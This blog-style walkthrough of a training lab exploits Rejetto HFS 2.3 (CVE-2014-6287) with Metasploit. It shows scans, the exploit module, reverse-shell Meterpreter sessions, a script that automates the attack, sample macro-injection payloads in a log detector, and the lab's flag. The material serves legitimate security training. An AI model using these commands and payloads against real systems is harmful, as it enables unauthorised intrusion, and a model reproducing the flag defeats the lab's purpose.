Exploiting A Vulnerable HTTP File Server

Posted by r3kind1e on January 23, 2023

An HTTP File Server (HFS) is a web server designed for file and document sharing.

HTTP file servers typically listen on TCP port 80 and use HTTP for the underlying communication.

Rejetto HFS is a popular free and open source HTTP file server. The 2.x branch is a native Windows application; it can also be run on Linux under Wine.

Rejetto HFS 2.3 (releases 2.3, 2.3a and 2.3b; fixed in 2.3c) is vulnerable to remote command execution, tracked as CVE-2014-6287: a null byte (%00) in the search parameter defeats the check that is supposed to neutralise HFS scripting macros in user input.

MSF (the Metasploit Framework) has an exploit module that we can use to gain access to the target system hosting HFS.

Demo: Exploiting A Vulnerable HTTP File Server

The exploitation process combines everything from the previous sections. First, we port scan and enumerate the target to identify whether an HTTP File Server is running on it. We then enumerate the version of that file server; in this case it should be Rejetto HFS 2.3. Finally we search for and load the relevant exploit module, configure it, and run it, which should give us a Meterpreter session.

Target IP Address: 10.2.24.160

Ensure that the PostgreSQL database service is started, so that msfconsole can connect to the Metasploit Framework database and we can create workspaces.

service postgresql start

Start up the Metasploit Framework console.

msfconsole

Check the status of the database to ensure that we are connected.

db_status

Create a workspace called HFS.

workspace -a HFS

We are currently working within the HFS workspace.

Set the RHOSTS option globally with setg, so that we don't need to specify the target IP every time we load a module. A global variable applies to every module we load from now on (a value set inside a module with set still takes precedence).

setg RHOSTS 10.2.24.160

We're going to perform an Nmap scan and store the results directly in the Metasploit Framework database:

db_nmap -sS -sV -O 10.2.24.160

-sS: perform a SYN scan.

-sV: perform service version detection.

-O: perform operating system detection.

db_nmap runs the scan and imports the results into the database under the current workspace, so we can analyze them directly from msfconsole with the hosts and services commands.

Browse to port 80 to confirm that HFS is indeed running:

http://10.2.24.160

We have Rejetto HTTP File Server 2.3 running on port 80, as well as a few other Windows services (RPC, NetBIOS, SMB, RDP). Nmap's service detection also gives us an idea of the target operating system; in this case it reports Windows Server 2008 R2 (on Windows hosts Nmap often only narrows this to a range such as "2008 R2 - 2012", so treat it as a hint and confirm with sysinfo once you have a session). Knowing the OS family and architecture matters when we choose the Meterpreter payload and platform for the exploit module.
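As an added example (not from the original post, and not code from Rejetto or Metasploit), here is a small shell fingerprint that performs the same version check from the command line and decides whether the reported version falls inside the range the exploit module targets. It assumes HFS 2.x announces itself in the HTTP Server header as "HFS <version>" (the same banner Nmap keys on); the response headers embedded below are constructed for the example, not captured from the lab host.

```shell
#!/bin/sh
# Added example: fingerprint Rejetto HFS from its HTTP Server header and
# decide whether the version is in the range affected by the %00 macro bypass
# (CVE-2014-6287: HFS 2.3, 2.3a and 2.3b; fixed in 2.3c).

# Extract the version string from raw response headers read on stdin.
# Assumption: HFS 2.x answers with a header such as "Server: HFS 2.3b".
hfs_version_from_headers() {
    # strip CR from HTTP line endings, then pull the token after "HFS"
    tr -d '\r' \
      | sed -n 's/^[Ss]erver:[[:space:]]*HFS[[:space:]]*\([0-9][0-9A-Za-z.]*\).*/\1/p' \
      | head -n 1
}

# Return 0 (true) when the version is one the exploit module targets.
hfs_version_vulnerable() {
    case "$1" in
        2.3|2.3a|2.3b) return 0 ;;
        *)             return 1 ;;
    esac
}

# Live check against a URL (needs curl); prints a one-line verdict.
# Exit codes: 0 vulnerable version, 1 not in range, 2 no HFS banner.
check_hfs_target() {
    url="$1"
    ver="$(curl -s -I --max-time 10 "$url" | hfs_version_from_headers)"
    if [ -z "$ver" ]; then
        echo "$url: no HFS Server header seen"
        return 2
    fi
    if hfs_version_vulnerable "$ver"; then
        echo "$url: HFS $ver - in the CVE-2014-6287 range"
        return 0
    fi
    echo "$url: HFS $ver - not in the affected range"
    return 1
}

# Constructed sample response (not captured from a real host) for offline use.
SAMPLE_HEADERS='HTTP/1.1 200 OK
Content-Type: text/html
Server: HFS 2.3b
Accept-Ranges: bytes'

# Offline usage:  printf '%s\n' "$SAMPLE_HEADERS" | hfs_version_from_headers
# Against the lab target it would be:  check_hfs_target http://10.0.19.137
```

The version list is deliberately an allow-list of the affected releases rather than a numeric comparison, because HFS version strings mix digits and letters (2.3b) and a later 2.3c is the patched one.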

Now that we know an HTTP File Server is running on the target, and which version, we can search for a matching exploit module directly from msfconsole:

search type:exploit name:rejetto

Then load it, review its options (RHOSTS is already populated from the global datastore), read the module info and run it:

use exploit/windows/http/rejetto_hfs_exec
show options
info
run

It automatically opens a Meterpreter session.

meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x86/windows
meterpreter > exit

We obtained a Meterpreter session without specifying a payload because the module has a default payload (the 32-bit windows/meterpreter/reverse_tcp stager). The module does not carry the payload inside the malicious request itself: it stands up a small web server of its own, makes HFS execute a short VBScript in %TEMP%, and that script downloads and runs the staged payload from the module's server (the "Payload request received" line in the output is that download). Two options control that server:

SRVHOST: The local host to listen on. This must be an address on the local machine (or 0.0.0.0) that the target can reach, because it is used to deliver the payload.

SRVPORT: The local port to listen on (default 8080). It, like the reverse handler port LPORT (default 4444), must be reachable from the target.

We can change the type of payload that we're utilizing based on the operating system architecture we want.

set payload windows/x64/meterpreter/reverse_tcp
show options
run

We have a 64-bit Meterpreter session as opposed to previously, when the default payload specified was the 32-bit Meterpreter payload.

meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x64/windows

You can always customize the payload you use for every exploit module based on the target operating system, as well as the architecture.
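Because the steps above are all typed interactively, here is an added example (not from the original post, not Metasploit's own code) that turns them into a msfconsole resource script so the run is repeatable. The shell function picks the Meterpreter stager from the architecture that sysinfo reports, and it sets LHOST and SRVHOST explicitly: on a multi-homed attack box (the lab Kali has a separate 10.10.X.Y lab interface) the address Metasploit auto-detects can be one the target cannot reach. The target address, LHOST value and output path are parameters of this example, not fixed values from the page.

```shell
#!/bin/sh
# Added example: generate a msfconsole resource script for the HFS exploit
# run described above. Assumptions: the target, LHOST and output path are
# supplied by the caller; LPORT 4444 and the check-before-run step are choices
# made for this example.

# Map the architecture string shown by `sysinfo` (or a known-good guess) to
# the matching Meterpreter stager. A 32-bit Meterpreter runs on x64 Windows
# (the first session above proves it), but the native x64 stager avoids
# WoW64 quirks when loading extensions or migrating, so prefer it when known.
hfs_payload_for_arch() {
    case "$1" in
        x64|amd64|x86_64) echo "windows/x64/meterpreter/reverse_tcp" ;;
        x86|i386|i686)    echo "windows/meterpreter/reverse_tcp" ;;
        *) echo "unknown architecture: $1" >&2; return 1 ;;
    esac
}

# Write the resource script. $1 target, $2 LHOST, $3 arch, $4 output file.
# Prints the output path on success.
write_hfs_rc() {
    target="$1"; lhost="$2"; arch="$3"; out="$4"
    payload="$(hfs_payload_for_arch "$arch")" || return 1
    cat > "$out" <<EOF
# generated msfconsole resource script; run with: msfconsole -q -r $out
workspace -a hfs
setg RHOSTS $target
db_nmap -sS -sV -O $target
services -p 80
use exploit/windows/http/rejetto_hfs_exec
set payload $payload
set LHOST $lhost
set LPORT 4444
set SRVHOST $lhost
check
run -z
EOF
    echo "$out"
}

# Usage (lab values from the page, path is an example):
#   write_hfs_rc 10.0.19.137 10.10.16.5 x64 ./hfs.rc && msfconsole -q -r ./hfs.rc
```

"check" asks the module to confirm the target is vulnerable before anything is executed on it (the search output lists Check: Yes for this module), and "run -z" backgrounds the session instead of dropping into it, which is what you want when the script continues with post-exploitation commands.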

That is how to exploit a vulnerable HTTP File Server.

Windows: HTTP File Server

Overview

A Kali GUI machine and a target machine running a vulnerable HTTP File Server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.

Objective: Exploit the application and retrieve the flag!

Instructions:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
  • The IP address of the target machine is mentioned in the file “/root/Desktop/target”
  • Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1945.pdf

My own approach

Target IP Address : 10.0.19.137

root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 > workspace -a hfs
[*] Added workspace: hfs
[*] Workspace: hfs
msf5 > set RHOSTS 10.0.19.137
RHOSTS => 10.0.19.137

At the top-level msf5 prompt no module is loaded, so set writes to the global datastore here (the same effect as setg); that is why RHOSTS is already populated when the exploit module is loaded later.
msf5 > db_nmap -sS -sV -O 10.0.19.137
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-23 17:47 IST
[*] Nmap: Nmap scan report for 10.0.19.137
[*] Nmap: Host is up (0.0029s latency).
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT      STATE SERVICE            VERSION
[*] Nmap: 80/tcp    open  http               HttpFileServer httpd 2.3
[*] Nmap: 135/tcp   open  msrpc              Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp  open  ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/23%OT=80%CT=1%CU=34221%PV=Y%DS=3%DC=I%G=Y%TM=63CE7B2
[*] Nmap: OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=
[*] Nmap: OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
[*] Nmap: OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
[*] Nmap: OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
[*] Nmap: OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
[*] Nmap: OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=7F%CD=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 86.99 seconds
Query the hosts and services tables that db_nmap populated. Note that os_name is only Nmap's best guess (the scan itself reported no exact OS match); the sysinfo output from the Meterpreter session later shows the real OS is Windows 2012 R2.

msf5 > hosts

Hosts
=====

address      mac  name  os_name      os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------      ---------  -----  -------  ----  --------
10.0.19.137             Windows 8.1                    client         

msf5 > services
Services
========

host         port   proto  name               state  info
----         ----   -----  ----               -----  ----
10.0.19.137  80     tcp    http               open   HttpFileServer httpd 2.3
10.0.19.137  135    tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.0.19.137  445    tcp    microsoft-ds       open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.19.137  3389   tcp    ssl/ms-wbt-server  open   
10.0.19.137  49152  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49153  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49154  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49155  tcp    msrpc              open   Microsoft Windows RPC
Search for a matching exploit module:

msf5 > search type:exploit name:rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

Rejetto HttpFileServer Remote Command Execution

The module description reads: Rejetto HttpFileServer (HFS) is vulnerable to remote command execution because of a poor regular expression in the file ParserLib.pas. This module exploits the HFS scripting commands by using "%00" to bypass the filtering. It has been tested successfully on HFS 2.3b on Windows XP SP3, Windows 7 SP1 and Windows 8.
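The detection side of the same bug, as an added example that is not part of the original post or of the Metasploit module: the bypass is visible on the wire as a percent-encoded null byte (%00) immediately followed by the HFS macro opener "{." in the search query parameter, and the opener itself may arrive percent-encoded (%7B%2E). The shell function below classifies access-log lines accordingly. The log lines are constructed for this example in Apache combined-style format and are assumed to come from a reverse proxy or sensor in front of HFS; the client addresses in them are placeholders.

```shell
#!/bin/sh
# Added example: flag HFS macro-injection attempts (the %00 bypass used by
# exploit/windows/http/rejetto_hfs_exec) in web access logs read from stdin.

# Print each input line prefixed with a verdict:
#   MACRO_INJECTION  %00 directly followed by "{." (raw or percent-encoded)
#   NULL_BYTE        %00 inside the search value but no macro opener after it
#   OK               anything else
classify_hfs_log() {
    while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -Eiq '%00([{]|%7b)([.]|%2e)'; then
            printf 'MACRO_INJECTION %s\n' "$line"
        elif printf '%s\n' "$line" | grep -Eiq 'search=[^ "]*%00'; then
            # a null byte in a file search is never legitimate; lower severity
            printf 'NULL_BYTE %s\n' "$line"
        else
            printf 'OK %s\n' "$line"
        fi
    done
}

# Count input lines that received the verdict given as $1.
count_by_class() {
    classify_hfs_log | awk -v c="$1" '$1 == c { n++ } END { print n + 0 }'
}

# Constructed sample log (not captured traffic); the first two lines mimic the
# request shape the module sends, once raw and once percent-encoded.
SAMPLE_LOG='10.10.16.5 - - [23/Jan/2023:18:06:25 +0530] "GET /?search=%00{.exec|cmd.exe+/c+whoami.} HTTP/1.1" 200 1512
10.10.16.5 - - [23/Jan/2023:18:06:26 +0530] "GET /?search=%00%7B.exec%7Ccmd.exe%20/c%20whoami.%7D HTTP/1.1" 200 1512
192.168.56.20 - - [23/Jan/2023:18:07:01 +0530] "GET /?search=%00notes HTTP/1.1" 200 3401
192.168.56.21 - - [23/Jan/2023:18:07:30 +0530] "GET /?search=report.pdf HTTP/1.1" 200 3401'

# Usage:  printf '%s\n' "$SAMPLE_LOG" | classify_hfs_log
#         tail -f access.log | classify_hfs_log | grep -v '^OK '
```

Matching on the encoded form rather than on a decoded request body is deliberate: a literal NUL cannot survive in a text log, so the %00 token is the artifact that actually persists, and checking both the raw and the %7B%2E spelling of the opener covers clients that encode the brace.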

Load the module and review its options. The exploit target is Automatic, and RHOSTS is already populated from the global datastore:

msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.19.137      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic
Run the module with its default 32-bit Meterpreter payload:

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Using URL: http://0.0.0.0:8080/dd0dlD
[*] Local IP: http://10.10.16.5:8080/dd0dlD
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /dd0dlD
[*] Sending stage (180291 bytes) to 10.0.19.137
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.0.19.137:49623) at 2023-01-23 18:06:25 +0530
[!] Tried to delete %TEMP%\AhmCpAHBTgeesQ.vbs, unknown result
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
Switch to the native 64-bit stager and run the module again. Note the [!] line in both runs: the module tries to delete the VBScript dropper it wrote to %TEMP% but cannot confirm the result, so the file may be left on the target and should be cleaned up, or at least recorded, as part of the engagement.

msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Using URL: http://0.0.0.0:8080/WGC9TXBGdHuXMWN
[*] Local IP: http://10.10.16.5:8080/WGC9TXBGdHuXMWN
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /WGC9TXBGdHuXMWN
[*] Sending stage (206403 bytes) to 10.0.19.137
[*] Meterpreter session 2 opened (10.10.16.5:4444 -> 10.0.19.137:49686) at 2023-01-23 18:10:06 +0530
[!] Tried to delete %TEMP%\xXApgs.vbs, unknown result
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

SEARCHING FOR CONTENT

meterpreter > search -f flag*
Found 2 results...
    c:\flag.txt (32 bytes)
    c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (481 bytes)
meterpreter > cat c:\\flag.txt
f74c8347798f4082daf4b4570dba094a